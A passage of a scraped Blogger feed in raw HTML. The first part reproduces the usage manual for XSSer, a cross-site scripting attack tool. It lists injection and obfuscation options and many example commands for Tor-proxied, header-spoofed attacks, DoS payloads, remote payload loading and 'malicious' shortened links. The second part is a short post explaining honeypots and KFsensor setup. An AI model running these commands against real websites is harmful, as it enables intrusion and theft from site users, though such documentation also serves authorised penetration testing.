<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--Str<span class="Apple-tab-span" style="white-space: pre; "> </span>Use method String.FromCharCode()
<br />--Une<span class="Apple-tab-span" style="white-space: pre; "> </span>Use function Unescape()
<br />--Mix<span class="Apple-tab-span" style="white-space: pre; "> </span>Mix String.FromCharCode() and Unescape()
<br />--Dec<span class="Apple-tab-span" style="white-space: pre; "> </span>Use Decimal encoding
<br />--Hex<span class="Apple-tab-span" style="white-space: pre; "> </span>Use Hexadecimal encoding
<br />--Hes<span class="Apple-tab-span" style="white-space: pre; "> </span>Use Hexadecimal encoding, with semicolons
<br />--Dwo<span class="Apple-tab-span" style="white-space: pre; "> </span>Encode vectors IP addresses in DWORD
<br />--Doo<span class="Apple-tab-span" style="white-space: pre; "> </span>Encode vectors IP addresses in Octal
<br />--Cem<span class="Apple-tab-span" style="white-space: pre; "> </span>Try -manually- different Character Encoding mutations</blockquote>(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')
<br />
<br /><b><u>*Special Technique(s)*:</u></b>
<br />These options can be used to try to inject code using different type of XSS techniques. You can select multiple:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--Coo<span class="Apple-tab-span" style="white-space: pre; "> </span>COO - Cross Site Scripting Cookie injection
<br />--Xsa<span class="Apple-tab-span" style="white-space: pre; "> </span>XSA - Cross Site Agent Scripting
<br />--Xsr<span class="Apple-tab-span" style="white-space: pre; "> </span>XSR - Cross Site Referer Scripting
<br />--Dcp<span class="Apple-tab-span" style="white-space: pre; "> </span>DCP - Data Control Protocol injections
<br />--Dom<span class="Apple-tab-span" style="white-space: pre; "> </span>DOM - Use Anchor Stealth (DOM shadows!)
<br />--Ind<span class="Apple-tab-span" style="white-space: pre; "> </span>IND - HTTP Response Splitting Induced code
<br />--Anchor<span class="Apple-tab-span" style="white-space: pre; "> </span>ANC - Use Anchor Stealth payloader (DOM shadows!)</blockquote>
<br /><b><u>*Select Final injection(s)*:</u></b>
<br />These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities.
<br />Choose only one option:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--Fp=FINALPAYLOAD<span class="Apple-tab-span" style="white-space: pre; "> </span>OWN - Insert your final code to inject -manually-
<br />--Fr=FINALREMOTE<span class="Apple-tab-span" style="white-space: pre; "> </span>REMOTE - Insert your final code to inject -remotelly-
<br />--Doss<span class="Apple-tab-span" style="white-space: pre; "> </span>DOSs - XSS Denial of service (server) injection
<br />--Dos<span class="Apple-tab-span" style="white-space: pre; "> </span>DOS - XSS Denial of service (client) injection
<br />--B64<span class="Apple-tab-span" style="white-space: pre; "> </span>B64 - Base64 code encoding in META tag (rfc2397)</blockquote>
<br /><b>*Special Final injection(s)*:</b>
<br />These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code (except with DCP code):
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--Onm<span class="Apple-tab-span" style="white-space: pre; "> </span>ONM - Use onMouseMove() event to inject code
<br />--Ifr<span class="Apple-tab-span" style="white-space: pre; "> </span>IFR - Use "iframe" source tag to inject code</blockquote>
<br /><b><u>*Miscellaneous*:</u></b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--silent<span class="Apple-tab-span" style="white-space: pre; "> </span>inhibit console output results
<br />--update<span class="Apple-tab-span" style="white-space: pre; "> </span>check for XSSer latest stable version
<br />--save<span class="Apple-tab-span" style="white-space: pre; "> </span>output all results directly to template (XSSlist.dat)
<br />--xml=FILEXML<span class="Apple-tab-span" style="white-space: pre; "> </span>output 'positives' to aXML file (--xml filename.xml)
<br />--publish<span class="Apple-tab-span" style="white-space: pre; "> </span>output 'positives' to Social Networks (identi.ca)
<br />--short=SHORTURLS<span class="Apple-tab-span" style="white-space: pre; "> </span>display -final code- shortered (tinyurl, is.gd)
<br />--launch<span class="Apple-tab-span" style="white-space: pre; "> </span>launch a browser at the end with each XSS discovered</blockquote><b><u><span class="Apple-style-span" style="font-size: large; ">Examples</span></u></b>
<br />
<br />If you have interesting examples of usage about XSSer, please send an email to the mailing list.
<br />
<br />-------------------
<br /><b>* Simple injection from URL:</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com"</blockquote>-------------------
<br /><b>* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666" </blockquote>-------------------
<br /><b>* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w</blockquote>-------------------
<br /><b>* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"</blockquote>-------------------
<br /><b>* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une</blockquote>-------------------
<br /><b>* Injection from Dork selecting "duck" engine (XSSer Storm!):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py --De "duck" -d "search.php?"</blockquote>-------------------
<br /><b>* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -c3 --Cw=4 -u "http://host.com"</blockquote>-------------------
<br /><b>* Simple injection from URL, using POST, with statistics results:</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s</blockquote>-------------------
<br /><b>* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl </blockquote>-------------------
<br /><b>* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"</blockquote>-------------------
<br /><b>* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"</blockquote>-------------------
<br /><b>* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!): </b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"</blockquote>-------------------
<br /><b>* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!" </blockquote>-------------------
<br /><b>* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml" </blockquote>-------------------
<br /><b>* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca</b>
<br /><b>(federated XSS pentesting botnet)</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -d "login.php" --De "duck" --publish</blockquote>
<br /><b><span class="Apple-style-span" style="font-size: large; ">* <u>Examples online:</u></span></b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">- http://identi.ca/xsserbot01
<br />- http://twitter.com/xsserbot01</blockquote>-------------------
<br /><b>* Create a .swf movie with XSS code injected</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); "><b>$ python xsser.py --fla "name_of_file"</b></blockquote>-------------------
<br /><b>* Send a pre-checking hash to see if target will generate -false positive- results</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "host.com" --hash</blockquote>-------------------
<br /><b>* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed in a shortered link, on positive results founded. XSS real-time exploiting.</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"</blockquote>-------------------
<br /><b>* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64</blockquote>-------------------
<br /><b>* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch</blockquote>
<br /><b><u><span class="Apple-style-span" style="font-size: large; ">ScreenShots:</span></u></b>
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUCoI-zhNp-9RRz09M0rT816bfs9Epdk9BvloucgD4MwOsYFlKndVoC0g1OSMDs3SANsUylZoP23qcga-LFjUkk-l2RiCjkSy9RVs2yNGq0wxSc7lhxZnONJ6eI5_KGowUlZmO99O7y3Y/s1600/xsser_core_report.png" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUCoI-zhNp-9RRz09M0rT816bfs9Epdk9BvloucgD4MwOsYFlKndVoC0g1OSMDs3SANsUylZoP23qcga-LFjUkk-l2RiCjkSy9RVs2yNGq0wxSc7lhxZnONJ6eI5_KGowUlZmO99O7y3Y/s320/xsser_core_report.png" width="320" alt="xsser_core_report" title="xsser_core_report" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij2QWgvW-z5H97XDY4vecbmeTgcWxZBx2t8jyOFWsjLg1nd5g1C_FAg5vSvVSmA8-kXOf8oecmeUwjINmI4MPcampndyLx5PtMpgDKEQ2SH_VZkgH_OZ4DFLtK2zB4dgDKWtQLSWqekE0/s1600/xsser_dcp_sm.png" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij2QWgvW-z5H97XDY4vecbmeTgcWxZBx2t8jyOFWsjLg1nd5g1C_FAg5vSvVSmA8-kXOf8oecmeUwjINmI4MPcampndyLx5PtMpgDKEQ2SH_VZkgH_OZ4DFLtK2zB4dgDKWtQLSWqekE0/s1600/xsser_dcp_sm.png" alt="xsser_dcp_sm" title="xsser_dcp_sm" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK1Y40PN_kB7WSzys0_UgapNXPmOeND54mXP8o2uUVv2XfD-0yO5T4oyqjk9tW6vpViGsz_8Mt-Upu1cTddx7uHShyphenhyphenhjf4yjlLigJocMz_NNbumhuiecERyrM2DLS3ckhHjlIXrQaI2n8/s1600/xsser_finalcode.png" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK1Y40PN_kB7WSzys0_UgapNXPmOeND54mXP8o2uUVv2XfD-0yO5T4oyqjk9tW6vpViGsz_8Mt-Upu1cTddx7uHShyphenhyphenhjf4yjlLigJocMz_NNbumhuiecERyrM2DLS3ckhHjlIXrQaI2n8/s320/xsser_finalcode.png" width="320" alt="xsser_finalcode" title="xsser_finalcode" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkwnapQSLNWIQxqVL5Xtk92e5WpP_DHZx-j0G1ZeMiBTAFi4-RMK-BFL-ZlRltvLt-E9pxycNDGUGQ81xgPveudKPiFqbCvnCqU5wLw0TkIe2P-hnUFAHmJOVGpM0Np1aKYN1Ck08f4E8/s1600/xsser_gtk3.png" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkwnapQSLNWIQxqVL5Xtk92e5WpP_DHZx-j0G1ZeMiBTAFi4-RMK-BFL-ZlRltvLt-E9pxycNDGUGQ81xgPveudKPiFqbCvnCqU5wLw0TkIe2P-hnUFAHmJOVGpM0Np1aKYN1Ck08f4E8/s320/xsser_gtk3.png" width="320" alt="xsser_gtk3" title="xsser_gtk3" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8ucUgoLtAGIsSM-u-7dLFhxhfLDnankSISTqBHkOeA6sniOOBaxXHqM4qdA2CztvvdHzG3akFUxtvmFjSQBKEoGfnvQsZqn-qZGck8uVRbo-f7k5fhtJi0oMukFHK4F1YpBWNJeD4_Vo/s1600/xsser_help.png" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8ucUgoLtAGIsSM-u-7dLFhxhfLDnankSISTqBHkOeA6sniOOBaxXHqM4qdA2CztvvdHzG3akFUxtvmFjSQBKEoGfnvQsZqn-qZGck8uVRbo-f7k5fhtJi0oMukFHK4F1YpBWNJeD4_Vo/s320/xsser_help.png" width="320" alt="xsser_help" title="xsser_help" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div><b><u><span class="Apple-style-span" style="font-size: large; ">
<br /></span></u></b>
<br />
<br /><b><u>Download:<span class="Apple-style-span" ><span class="Apple-style-span" style="outline-width: initial; outline-color: initial;"><a href="http://xsser.sourceforge.net/#download">http://xsser.sourceforge.net/#download</a></span></span></u></b></div></div><p></p><div class="postmeta-secondary" style="color: rgb(135, 135, 135); font-size: 11px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; ">
<br /></div></div></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-26699797570182422752011-09-04T01:40:00.000-07:002011-09-04T01:48:23.809-07:00HONEY POT Trap Hackers<span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><div class="postmeta-primary" style="text-transform: uppercase; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-bottom: 10px; "><span class="Apple-style-span" ><span class="Apple-style-span" style="font-size: 12px; line-height: 20px;"><b>
<br /></b></span></span><span class="Apple-style-span" ><span class="meta_comments" style="padding-top: 3px; padding-right: 0px; padding-bottom: 3px; padding-left: 10px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHMAQqoqEdYxz4idNYm_9NxuT32FBFnFVY9TwdgQRox0rhsYHpgHA5nnNV8j47InC-UU7KvaSKLEwWeVOLq5TDV1cTfethNA_hu4PCHB25KD3NwPa-aX6JqtL4GdZmIin3Kz7CiYtN2G8/s1600/meta-separator.png); background-position: 0% 50%; background-repeat: no-repeat no-repeat; font-size: 11px;"></span></span></div><div class="post-body entry-content" style="color: rgb(84, 84, 84); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 10px; padding-bottom: 5px; padding-left: 10px; font-family: Arial, Verdana; font-size: 12px; line-height: 20px; "><p></p><div style="border-top-left-radius: 15px 15px; border-top-right-radius: 15px 15px; border-bottom-right-radius: 15px 15px; border-bottom-left-radius: 15px 15px; border-top-color: rgb(104, 104, 104); border-right-color: rgb(104, 104, 104); border-bottom-color: rgb(104, 104, 104); border-left-color: rgb(104, 104, 104); border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; "><div id="element" style="height: 500px; overflow-x: auto; overflow-y: auto; "><b>What is HoneyPot??</b>
<br />In layman terms we can say it is a trap set by the administrators for the hackers, to fool them or to make them believe that they are hacking into admins system, but instead of that hackers are getting hacked by the admin.
<br />
<br /><b>How does this work??</b>
<br />This works by presenting the hackers a foul scenario where , hacker thinks that he is penetrating into the system but instead, he is going no where except he is playing in the world created by the admins. By doing so, admins are able to check all the malicious activity of the hackers like what all ports hackers are trying to connect, what files they are trying to upload, which all sections they are trying to access.
<br />
<br />HonyPot is mainly designed to trap the hackers, or present a virtual system to the hackers which never exists.
<br />
<br />Technically, Honeypot tries to listen to all the ports on the system, and whenever hacker tries to port scan the system, it gets a list of open ports which he thinks is open but actually, it is the opened port which is shown by the honeypot behind the firewall, so when ever hacker tries to access some random port say 100, then he is accessing the honeypot not the system,
<br />
<br />Above scenario can be visualised better: Install a VM ware on a system and run any low version of windows or linux on it with all ports open, and port forward those ports on the host system, so when ever hacker tries to fingerprint or try to do port scan, then he will be gettng info about the VM ware not the host system, hacker may be able to penetrate into the VM ware OS, but our HOST OS remains safe.
<br />
<br />But there are mainly deficulty in doing the above job , so special application is created called HONEYPOT to do this job and many other jobs like tracking of packets, file access etc.
<br />
<br /><b>There are mainly 3 types of honeypots available:</b>
<br />1.Small: Mainly keeps the log of ip-address which are trying to access your system alongwith the port
<br />2.Medium: Its functionality is little advanced, keeping track of files accessed, time-period, hosts etc.
<br />3.Large: It provides all the functionality, but the main feature of these kind of Honeypots are security feature, these can simulate virtual os for the outsiders or hackers very well.
<br />
<br />In this article I am going to give the example of HoneyPot of small scale for Windows.
<br />HoneyPots are available both on commercial platform and also as open source, I am taking the example of KFsensor which is freely available here.
<br />STEP 1: Download the KFSENSOR and winpcap from their website and install them
<br />STEP 2: Restart your system, start winpcap server from the folder menu where it is saved mainly in c:\ drive
<br />STEP 3: Start KFsensor, do as promted in the window , it is mainly for the configuring of your new HONEYPOT.
<br />STEP4: Done, keep your system up for the packets scanning.
<br />
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMN1Toyxnh8roi7d6wuOswYaeWHx59QKEq4TnYcqV7MgDcxZqm_3Pz3oSj-UA4eSAW5eLWUhsbjmi0ai8vu7oeFVdavzO3iZnv6OTjeTUyZUsH7ykBZRDe6ccDd81QssKrdFu1TO8gRnY/s1600/untitled.jpg" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="279" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMN1Toyxnh8roi7d6wuOswYaeWHx59QKEq4TnYcqV7MgDcxZqm_3Pz3oSj-UA4eSAW5eLWUhsbjmi0ai8vu7oeFVdavzO3iZnv6OTjeTUyZUsH7ykBZRDe6ccDd81QssKrdFu1TO8gRnY/s400/untitled.jpg" alt="untitled" title="untitled" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br />Here in above picture u can see some port numbers are striked out, because you need to restart the system, then start your honeypot, then internet connection, else these ports will be used by net connection first, then this honeypot willnot be able to access these ports, hence no information gathering will be possible.
<br />
<br />We can also create our small honeypot whose main function is to check for the incoming packets.......
<br />It is nothing but the basic client-server program which listens on all port.
<br />
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHXt9p4Xm8qUR818SmxRWce3ni6TfoBRrCH-7tPgB_piogwU0uGRS6gmolWQ0yF4FigGg0wdwJH8sd3tpuaBcvOsuvHsHdzGgkcDBwlPMP8FEmvxzCW1iof8dmdZhr-ysseNLOfUEG0Bg/s1600/untitled+%25281%2529.jpg" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="280" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHXt9p4Xm8qUR818SmxRWce3ni6TfoBRrCH-7tPgB_piogwU0uGRS6gmolWQ0yF4FigGg0wdwJH8sd3tpuaBcvOsuvHsHdzGgkcDBwlPMP8FEmvxzCW1iof8dmdZhr-ysseNLOfUEG0Bg/s400/untitled+%25281%2529.jpg" alt="untitled%2B%25281%2529" title="untitled%2B%25281%2529" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; 